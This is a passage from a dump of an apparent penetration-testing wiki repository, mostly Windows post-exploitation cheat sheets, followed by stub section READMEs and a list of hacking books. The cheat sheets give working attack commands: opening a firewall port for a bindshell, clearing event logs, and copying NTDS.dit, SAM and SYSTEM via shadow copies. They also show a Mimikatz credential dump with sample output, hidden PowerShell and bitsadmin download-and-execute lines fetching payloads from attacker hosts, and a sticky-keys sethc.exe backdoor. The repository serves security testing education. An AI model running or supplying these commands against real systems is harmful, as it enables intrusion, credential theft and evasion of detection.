set https_proxy=https://username:password@your_proxy:your_port|Use proxy in command prompt| 40 | 41 | ## Whitelist 42 | 43 | |**Command**|**Description**| 44 | |:----------|:--------------| 45 | |NETSH FIREWALL show all|Show Allowed programs configuration for Domain/Standard profile.| 46 | |NETSH FIREWALL add allowedprogram `C:\Windows\system32\cmd.exe` `cmd` enable|Add a program into firewall allowedprogram Whitelist.| 47 | |NETSH FIREWALL delete allowedprogram `cmd`|delete a item from firewall allowedprogram Whitelist, you can also use a path to delete it.| 48 | |NETSH FIREWALL show all|Show Port configuration for Domain/Standard.| 49 | |NETSH FIREWALL add portopening tcp `4444` `bindshell` enable all|add tcp port 4444 into port Whitelist.| 50 | 51 | ## Service 52 | 53 | |**Command**|**Description**| 54 | |:----------|:--------------| 55 | |sc create `servicename` type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename|Create malicious services, and gain local system privilege.| 56 | 57 | ## Scheduler 58 | 59 | 60 | |**Command**|**Description**| 61 | |:----------|:--------------| 62 | |net use \\\\`IP`\ipc$ `password` /user:`username`
at \\\\`ComputerName` `time` "command"|The AT command schedules commands and programs to run on a computer at a specified time and date. `net time [/domain]` to show current time.| 63 | 64 | ## Logs 65 | 66 | |**Command**|**Description**| 67 | |:----------|:--------------| 68 | |del %WINDIR%\*.log /a /s /q /f|Deletes all *.log files from the %WINDIR% directory.| 69 | |wevtutil el|Lists the different log files the system is keeping.| 70 | |for /f %a in ('wevtutil el') do @wevtutil cl "%a"|Clears the contents of a specific log.| 71 | |powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security|Clear specific event logs| 72 | 73 | # Links 74 | 75 | 1. [**How to execute metasploit vbs payload in cmd.exe ?**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/Execute_metasploit_vbs_payload_in_cmd_shell.md) 76 | 2. [**Hacking Windows Active Directory**]( https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/Hacking_Windows_Active_Directory.md) 77 | 3. [**How to dump windows 2012 credentials ?**]( https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/How-to-dump-windows2012-credentials.md) 78 | 4. [**How to use PowerSploit Invoke-Mimikatz to dump credentials ?**](https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/PowerSploit_Invoke-Mimikatz_in_cmd.md) 79 | 5. [**How to use vssadmin ?**]( https://github.com/nixawk/pentest-wiki/blob/master/Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md) 80 | -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/How-to-use-vssadmin.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ## Vssadmin 6 | 7 | Applies To: Windows Server 2003, Windows Server 2008, Windows Server 2003 R2, Windows Server 2008 R2, Windows Server 2012, Windows 8 8 | 9 | | **Command** | **Description** | 10 | |:----------|:---------------| 11 | |Vssadmin add shadowstorage | Adds a volume shadow copy storage association.| 12 | | Vssadmin create shadow | Creates a new volume shadow copy. | 13 | | Vssadmin delete shadows | Deletes volume shadow copies. | 14 | | Vssadmin delete shadowstorage | Deletes volume shadow copy storage associations. | 15 | | Vssadmin list providers | Lists registered volume shadow copy providers. | 16 | |Vssadmin list shadows|Lists existing volume shadow copies.| 17 | |Vssadmin list shadowstorage|Lists all shadow copy storage associations on the system.| 18 | |Vssadmin list volumes|Lists volumes that are eligible for shadow copies.| 19 | |Vssadmin list writers|Lists all subscribed volume shadow copy writers on the system.| 20 | |Vssadmin resize shadowstorage|Resizes the maximum size for a shadow copy storage association.| 21 | 22 | ## With Administrator Privilege 23 | 24 | ``` 25 | PS C:\Users\Administrator\Desktop>vssadmin List Shadows 26 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 27 | (C) Copyright 2001-2005 Microsoft Corp. 28 | 29 | Error: You don't have the correct permissions to run this command. Please run t 30 | his utility from a command 31 | window that has elevated administrator privileges. 32 | 33 | ``` 34 | 35 | ## List Shadows 36 | 37 | ``` 38 | C:\Windows\system32>vssadmin List Shadows 39 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 40 | (C) Copyright 2001-2005 Microsoft Corp. 41 | 42 | No items found that satisfy the query. 43 | ``` 44 | 45 | ### Create Shadow 46 | 47 | ``` 48 | C:\Windows\system32>vssadmin Create Shadow /for=C: 49 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 50 | (C) Copyright 2001-2005 Microsoft Corp. 51 | 52 | Successfully created shadow copy for 'C:\' 53 | Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85} 54 | Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 55 | ``` 56 | 57 | ### Copy Files 58 | 59 | ``` 60 | PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ 61 | PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C 62 | :\temp\ 63 | PS C:\Users\Administrator\Desktop> copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\t 64 | emp\ 65 | 66 | C:\Windows\system32>vssadmin List Shadows 67 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 68 | (C) Copyright 2001-2005 Microsoft Corp. 69 | 70 | Contents of shadow copy set ID: {7b37f005-c738-450c-83cd-ad2f237f2b28} 71 | Contained 1 shadow copies at creation time: 11/5/2016 1:19:40 AM 72 | Shadow Copy ID: {153b6835-be81-45ed-bd01-2edbf4f61a85} 73 | Original Volume: (C:)\\?\Volume{be4f748a-a19f-11e6-a5bb-806e6f6e6963}\ 74 | Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 75 | Originating Machine: SERVER2008.thegeekstuff.com 76 | Service Machine: SERVER2008.thegeekstuff.com 77 | Provider: 'Microsoft Software Shadow Copy provider 1.0' 78 | Type: ClientAccessible 79 | Attributes: Persistent, Client-accessible, No auto release, No writers, 80 | Differential 81 | ``` 82 | 83 | 84 | ### Delete Shadows 85 | 86 | ``` 87 | C:\Windows\system32>vssadmin Delete Shadows /For=C: 88 | vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool 89 | (C) Copyright 2001-2005 Microsoft Corp. 90 | 91 | Do you really want to delete 1 shadow copies (Y/N): [N]? Y 92 | 93 | Successfully deleted 1 shadow copies. 94 | ``` 95 | 96 | ---- 97 | 98 | 99 | ## Invoke-NinjaCopy 100 | 101 | ``` 102 | PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -ComputerName SERVER -localDestination "C:\temp\SYSTEM" 103 | PS C:\Users\Administrator> Invoke-NinjaCopy -Path "C:\Windows\NTDS\NTDS.dit" -ComputerName SERVER -localDestination "C:\temp\NTDS.dit" 104 | ``` 105 | 106 | ## References 107 | 108 | 1. https://technet.microsoft.com/en-us/library/cc754968(v=ws.11).aspx 109 | 2. [Tutorial for NTDS goodness (VSSADMIN, WMIS, NTDS.dit, SYSTEM)](https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/) 110 | 3. [How Attackers Pull the Active Directory Database (NTDS.dit) from a Domain Controller](https://adsecurity.org/?p=451) 111 | 4. https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/ 112 | 5. https://github.com/clymb3r/PowerShell/blob/master/Invoke-NinjaCopy/Invoke-NinjaCopy.ps1 113 | -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/PowerSploit_Invoke-Mimikatz_in_cmd.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ``` 6 | C:\Windows\system32>powershell -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" 7 | 8 | .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Dec 14 2015 18:03:07) 9 | .## ^ ##. 10 | ## / \ ## /* * * 11 | ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) 12 | '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) 13 | '#####' with 17 modules * * */ 14 | 15 | 16 | mimikatz(powershell) # sekurlsa::logonpasswords 17 | 18 | Authentication Id : 0 ; 446842 (00000000:0006d17a) 19 | Session : Interactive from 1 20 | User Name : test 21 | Domain : lab 22 | Logon Server : LAB 23 | Logon Time : 10/14/2016 6:38:14 AM 24 | SID : S-1-5-21-2035202921-1308571849-2301429434-1000 25 | msv : 26 | [00000003] Primary 27 | * Username : test 28 | * Domain : lab 29 | * NTLM : 8846f7eaee8fb117ad06bdd830b7586c 30 | * SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73 31 | [00010000] CredentialKeys 32 | * NTLM : 8846f7eaee8fb117ad06bdd830b7586c 33 | * SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73 34 | tspkg : 35 | * Username : test 36 | * Domain : lab 37 | * Password : password 38 | wdigest : 39 | * Username : test 40 | * Domain : lab 41 | * Password : password 42 | kerberos : 43 | * Username : test 44 | * Domain : lab 45 | * Password : (null) 46 | ssp : 47 | credman : 48 | 49 | Authentication Id : 0 ; 446819 (00000000:0006d163) 50 | Session : Interactive from 1 51 | User Name : test 52 | Domain : lab 53 | Logon Server : LAB 54 | Logon Time : 10/14/2016 6:38:14 AM 55 | SID : S-1-5-21-2035202921-1308571849-2301429434-1000 56 | msv : 57 | [00010000] CredentialKeys 58 | * NTLM : 8846f7eaee8fb117ad06bdd830b7586c 59 | * SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73 60 | [00000003] Primary 61 | * Username : test 62 | * Domain : lab 63 | * NTLM : 8846f7eaee8fb117ad06bdd830b7586c 64 | * SHA1 : e8f97fba9104d1ea5047948e6dfb67facd9f5b73 65 | tspkg : 66 | * Username : test 67 | * Domain : lab 68 | * Password : password 69 | wdigest : 70 | * Username : test 71 | * Domain : lab 72 | * Password : password 73 | kerberos : 74 | * Username : test 75 | * Domain : lab 76 | * Password : (null) 77 | ssp : 78 | credman : 79 | 80 | Authentication Id : 0 ; 997 (00000000:000003e5) 81 | Session : Service from 0 82 | User Name : LOCAL SERVICE 83 | Domain : NT AUTHORITY 84 | Logon Server : (null) 85 | Logon Time : 10/14/2016 6:37:59 AM 86 | SID : S-1-5-19 87 | msv : 88 | tspkg : 89 | wdigest : 90 | * Username : (null) 91 | * Domain : (null) 92 | * Password : (null) 93 | kerberos : 94 | * Username : (null) 95 | * Domain : (null) 96 | * Password : (null) 97 | ssp : 98 | credman : 99 | 100 | Authentication Id : 0 ; 996 (00000000:000003e4) 101 | Session : Service from 0 102 | User Name : LAB$ 103 | Domain : WORKGROUP 104 | Logon Server : (null) 105 | Logon Time : 10/14/2016 6:37:59 AM 106 | SID : S-1-5-20 107 | msv : 108 | tspkg : 109 | wdigest : 110 | * Username : LAB$ 111 | * Domain : WORKGROUP 112 | * Password : (null) 113 | kerberos : 114 | * Username : lab$ 115 | * Domain : WORKGROUP 116 | * Password : (null) 117 | ssp : 118 | credman : 119 | 120 | Authentication Id : 0 ; 54335 (00000000:0000d43f) 121 | Session : UndefinedLogonType from 0 122 | User Name : (null) 123 | Domain : (null) 124 | Logon Server : (null) 125 | Logon Time : 10/14/2016 6:37:58 AM 126 | SID : 127 | msv : 128 | tspkg : 129 | wdigest : 130 | kerberos : 131 | ssp : 132 | credman : 133 | 134 | Authentication Id : 0 ; 999 (00000000:000003e7) 135 | Session : UndefinedLogonType from 0 136 | User Name : LAB$ 137 | Domain : WORKGROUP 138 | Logon Server : (null) 139 | Logon Time : 10/14/2016 6:37:58 AM 140 | SID : S-1-5-18 141 | msv : 142 | tspkg : 143 | wdigest : 144 | * Username : LAB$ 145 | * Domain : WORKGROUP 146 | * Password : (null) 147 | kerberos : 148 | * Username : lab$ 149 | * Domain : WORKGROUP 150 | * Password : (null) 151 | ssp : 152 | credman : 153 | 154 | mimikatz(powershell) # exit 155 | Bye! 156 | ``` 157 | -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/Windows_AD_commands.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | ``` 6 | net view 7 | net view /domain 8 | net view /domain:DOMAINNAME 9 | net view \\domain-control 10 | net user 11 | net user /domain 12 | net localgroup administrators 13 | net localgroup administrators /domain 14 | net group /domain 15 | net group "Domain Admins" /domain 16 | net group "Domain Computers" /domain 17 | net group "Domain Controllers" /domain 18 | net group "Group Policy Creator Owners" /domain 19 | net time /domain 20 | net config 21 | net session 22 | net use \\ip\ipc$ password /user:username 23 | net share 24 | net accounts /domain 25 | ``` 26 | 27 | ``` 28 | wmic useraccount 29 | wmic useraccount LIST FULL 30 | wmic useraccount LIST BRIEF 31 | wmic useraccount LIST STATUS 32 | wmic startup 33 | wmic share 34 | wmic service 35 | wmic process where name="[PROCESS]" call terminate 36 | wmic process where ProcessId="[PID]" call terminate 37 | wmic /node:DC1 /user:DOMAIN\domainadminsvc /password:domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt" 38 | wmic qfe get hotfixid 39 | wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber 40 | wmic bios 41 | wmic bios LIST FULL 42 | ``` 43 | 44 | ``` 45 | netsh firewall show conf 46 | netsh firewall set service type = remotedesktop mode = enable 47 | netsh firewall add allowedprogram C:\nltest.exe mltest enable 48 | netsh firewall add portopening tcp 2482 lt enable all 49 | netsh int portproxy v4tov4 listenport=80 connecthost=[AttackerIP] connectport=80 50 | netsh wlan show profiles 51 | netsh wlan export profile folder=. key=clear 52 | netsh wlan set hostednetwork mode=[allow\|disallow] 53 | netsh wlan set hostednetwork ssid= key= keyUsage=persistent\|temporary 54 | netsh wlan [start|stop] hostednetwork 55 | ``` 56 | 57 | ``` 58 | netstat -ano 59 | netstat -ano -p tcp 60 | netstat -ano -p udp 61 | ``` 62 | 63 | ``` 64 | tasklist /V 65 | tasklist /M 66 | tasklist /FI "IMAGENAME eq cmd.exe" 67 | tasklist /FI "PID eq 4060" 68 | ``` 69 | 70 | ``` 71 | ipconfig /all 72 | ipconfig /displaydns 73 | ``` 74 | 75 | 76 | ``` 77 | powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))" 78 | powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')" 79 | ``` 80 | 81 | ``` 82 | bitsadmin /create backdoor 83 | bitsadmin /addfile backdoor http://192.168.20.10/theshell.exe C:\windows\temp\theshell.exe 84 | bitsadmin /SETMINRETRYDELAY 88000 85 | bitsadmin /SETNOTIFYCMDLINE backdoor C:\windows\temp\theshell.exe NULL 86 | bitsadmin /getnotifycmdline backdoor 87 | bitsadmin /listfiles backdoor 88 | bitsadmin /RESUME backdoor # Run the backdoor 89 | ``` 90 | 91 | ``` 92 | for /f %a in ('wevtutil el') do @wevtutil cl "%a" 93 | del %WINDIR%\*.log /a /s /q /f 94 | ``` 95 | 96 | ``` 97 | sc create cmdsys type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start cmdsys 98 | ``` 99 | 100 | ``` 101 | route print 102 | arp -a 103 | qwinsta 104 | qprocess 105 | nbtstat -A ip 106 | fsutil fsinfo drivers 107 | wmic volume LIST BRIEF 108 | systeminfo 109 | at 13:20 /interactive cmd 110 | type C:\Windows\system32\demo.txt 111 | gpresult /Z 112 | dir /b /s | find /I "password" 113 | FOR /F %f in ('dir /b /s C:\') do find /I "password" %f 114 | ``` 115 | 116 | ``` 117 | Replacing file as: sethc.exe 118 | @echo off 119 | c: > nul\cd\ > nul\cd %SYSTEMROOT%\System32\ > nul 120 | if exist %SYSTEMROOT%\System32\cmdsys\ rd /q %SYSTEMROOT%\System32\cmdsys\ > nul 121 | cmd %SYSTEMROOT%\System32\cmdsys\ > nul 122 | copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\cmd.bkp /y > nul 123 | copy /y c:\windows\system32\sethc.exe c:\windows\system32\cmdsys\sethc.bkp /y > nul 124 | copy /y c:\windows\system32\cmd.exe c:\windows\system32\cmdsys\sethc.exe /y > nul 125 | copy /y c:\windows\system32\cmdsys\sethc.exe c:\windows\system32\sethc.exe /y > nul 126 | exit 127 | ``` 128 | 129 | 130 | ## References 131 | 132 | 1. http://pwnwiki.io/ 133 | -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/msf-download-execute-vbs-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/4.Post-Exploitation/Windows_ActiveDirectory/msf-download-execute-vbs-payload.png -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/msf-execute-vbs-payload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/4.Post-Exploitation/Windows_ActiveDirectory/msf-execute-vbs-payload.png -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/4.Post-Exploitation/Windows_ActiveDirectory/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection-wp.pdf -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/4.Post-Exploitation/Windows_ActiveDirectory/us-15-Metcalf-Red-Vs-Blue-Modern-Active-Directory-Attacks-Detection-And-Protection.pdf -------------------------------------------------------------------------------- /4.Post-Exploitation/Windows_ActiveDirectory/windows-2012-lsass-dump.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/4.Post-Exploitation/Windows_ActiveDirectory/windows-2012-lsass-dump.png -------------------------------------------------------------------------------- /5.Privilege-Escalation/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Privilege Escalation 6 | 7 | Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions. 8 | 9 | |**Escalation Category**|**Bookmarks**| 10 | |:------------|:-----------| 11 | |Password Attacks|| 12 | |Privilege Escalation Media|| 13 | |Protocol Analysis|| 14 | |Spoofing Attacks|| 15 | 16 | # Links 17 | 18 | 1. https://en.wikipedia.org/wiki/Privilege_escalation 19 | -------------------------------------------------------------------------------- /6.Maintaining-Access/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Maintaining Access 6 | 7 | |**Category**|**Bookmarks**| 8 | |:-----------|:------------| 9 | |OS Backdoors|| 10 | |Tunneling|| 11 | |Web Backdoors|| 12 | 13 | 14 | 1. http://resources.infosecinstitute.com/penetration-testing-maintaining-access/ 15 | -------------------------------------------------------------------------------- /7.Reporting/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > 2 | 3 | ---- 4 | 5 | # Reporting 6 | 7 | *Reporting* is by far the most important element of a penetration test. You will use reports to communicate what you did, how you did it, and, most important, how the organization should fix the vulnerabilities discovered during the penetration test. 8 | 9 | 10 | # Links 11 | 12 | 1. http://www.pentest-standard.org/index.php/Reporting 13 | 2. https://github.com/juliocesarfort/public-pentesting-reports 14 | 3. https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf 15 | -------------------------------------------------------------------------------- /7.Reporting/amanhardikar-keepnote/knextinfra.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/7.Reporting/amanhardikar-keepnote/knextinfra.zip -------------------------------------------------------------------------------- /7.Reporting/amanhardikar-keepnote/knwebapps.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/7.Reporting/amanhardikar-keepnote/knwebapps.zip -------------------------------------------------------------------------------- /7.Reporting/amanhardikar-keepnote/knwireless.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nixawk/pentest-wiki/90d8ad7626f1804d5fe2c1a62c21c6463f8d9bdc/7.Reporting/amanhardikar-keepnote/knwireless.zip -------------------------------------------------------------------------------- /Books/README.md: -------------------------------------------------------------------------------- 1 | **Authors**: < [nixawk](https://github.com/nixawk) > 2 | 3 | ---- 4 | 5 | # Books 6 | 7 | 8 | ## Penetration Testing Books 9 | * [The Art of Exploitation by Jon Erickson, 2008](https://www.nostarch.com/hacking2.htm) 10 | * [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://www.nostarch.com/metasploit) 11 | * [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://www.nostarch.com/pentesting) 12 | * [Rtfm: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/) 13 | * [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/) 14 | * [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1) 15 | * [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4) 16 | * [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu) 17 | * [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6) 18 | * [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/) 19 | * [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) 20 | * [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677) 21 | * [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE) 22 | * [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362) 23 | * [Bug Hunter's Diary by Tobias Klein, 2011](https://www.nostarch.com/bughunter) 24 | * [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/) 25 | * [How to Hack Like a Pornstar](https://books2read.com/u/bWzdBx) - A step by step process for breaking into a BANK, Sparc Flow, 2017 26 | * [How to Hack Like a God](https://books2read.com/u/mBPGOy) - Master the secrets of hacking through real life scenarios , Sparc Flow, 2017 27 | * [How to Hack Like a Legend](https://amzn.to/2uWh1Up) - A hacker’s tale breaking into a secretive offshore company, Sparc Flow, 2018 28 | 29 | 30 | ## Hackers Handbook Series 31 | * [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) 32 | * [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) 33 | * [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) 34 | * [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) 35 | * [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html) 36 | * [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) 37 | * [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) 38 | * [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) 39 | * [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking) 40 | 41 | ## Defensive Development 42 | 43 | * [Holistic Info-Sec for Web Developers (bundle)](https://leanpub.com/b/holisticinfosecforwebdevelopers) 44 | 45 | ## Network Analysis Books 46 | * [Nmap Network Scanning by Gordon Fyodor Lyon, 2009](https://nmap.org/book/) 47 | * [Practical Packet Analysis by Chris Sanders, 2011](https://www.nostarch.com/packet2.htm) 48 | * [Wireshark Network Analysis by by Laura Chappell & Gerald Combs, 2012](http://www.wiresharkbook.com/) 49 | * [Network Forensics: Tracking Hackers through Cyberspace by Sherri Davidoff & Jonathan Ham, 2012](http://www.amazon.com/Network-Forensics-Tracking-Hackers-Cyberspace-ebook/dp/B008CG8CYU/) 50 | * [Network Security Assessment by Chris McNab](https://www.amazon.com/Network-Security-Assessment-Know-Your-ebook/dp/B0043EWUR0) 51 | 52 | ## Reverse Engineering Books 53 | * [Reverse Engineering for Beginners by Dennis Yurichev](http://beginners.re/) 54 | * [Hacking the Xbox by Andrew Huang, 2003](https://www.nostarch.com/xbox.htm) 55 | * [The IDA Pro Book by Chris Eagle, 2011](https://www.nostarch.com/idapro2.htm) 56 | * [Practical Reverse Engineering by Bruce Dang et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118787315.html) 57 | * [Gray Hat Hacking The Ethical Hacker's Handbook by Daniel Regalado et al., 2015](http://www.amazon.com/Hacking-Ethical-Hackers-Handbook-Edition/dp/0071832386) 58 | 59 | ## Malware Analysis Books 60 | * [Practical Malware Analysis by Michael Sikorski & Andrew Honig, 2012](https://www.nostarch.com/malware) 61 | * [The Art of Memory Forensics by Michael Hale Ligh et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118825098.html) 62 | * [Malware Analyst's Cookbook and DVD by Michael Hale Ligh et al., 2010](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470613033.html) 63 | * [How to Investigate Like a Rockstar](https://books2read.com/u/4jDWoZ) - Live a real crisis to master the secrets of forensic analysis, Sparc Flow, 2017 64 | 65 | ## Windows Books 66 | * [Windows Internals by Mark Russinovich et al., 2012](http://www.amazon.com/Windows-Internals-Part-Developer-Reference/dp/0735648735/) 67 | 68 | ## Social Engineering Books 69 | * [The Art of Deception by Kevin D. Mitnick & William L. Simon, 2002](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0471237124.html) 70 | * [The Art of Intrusion by Kevin D. Mitnick & William L. Simon, 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764569597.html) 71 | * [Ghost in the Wires by Kevin D. Mitnick & William L. Simon, 2011](http://www.hachettebookgroup.com/titles/kevin-mitnick/ghost-in-the-wires/9780316134477/) 72 | * [No Tech Hacking by Johnny Long & Jack Wiles, 2008](https://www.elsevier.com/books/no-tech-hacking/mitnick/978-1-59749-215-7) 73 | * [Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470639539.html) 74 | * [Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118608577.html) 75 | * [Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady, 2014](https://www.mhprofessional.com/product.php?isbn=0071818464) 76 | 77 | ## Lock Picking Books 78 | * [Practical Lock Picking by Deviant Ollam, 2012](https://www.elsevier.com/books/practical-lock-picking/ollam/978-1-59749-989-7) 79 | * [Keys to the Kingdom by Deviant Ollam, 2012](https://www.elsevier.com/books/keys-to-the-kingdom/ollam/978-1-59749-983-5) 80 | * [CIA Lock Picking Field Operative Training Manual](https://www.scribd.com/doc/7207/CIA-Lock-Picking-Field-Operative-Training-Manual) 81 | * [Lock Picking: Detail Overkill by Solomon](https://www.dropbox.com/s/y39ix9u9qpqffct/Lockpicking%20Detail%20Overkill.pdf?dl=0) 82 | * [Eddie the Wire 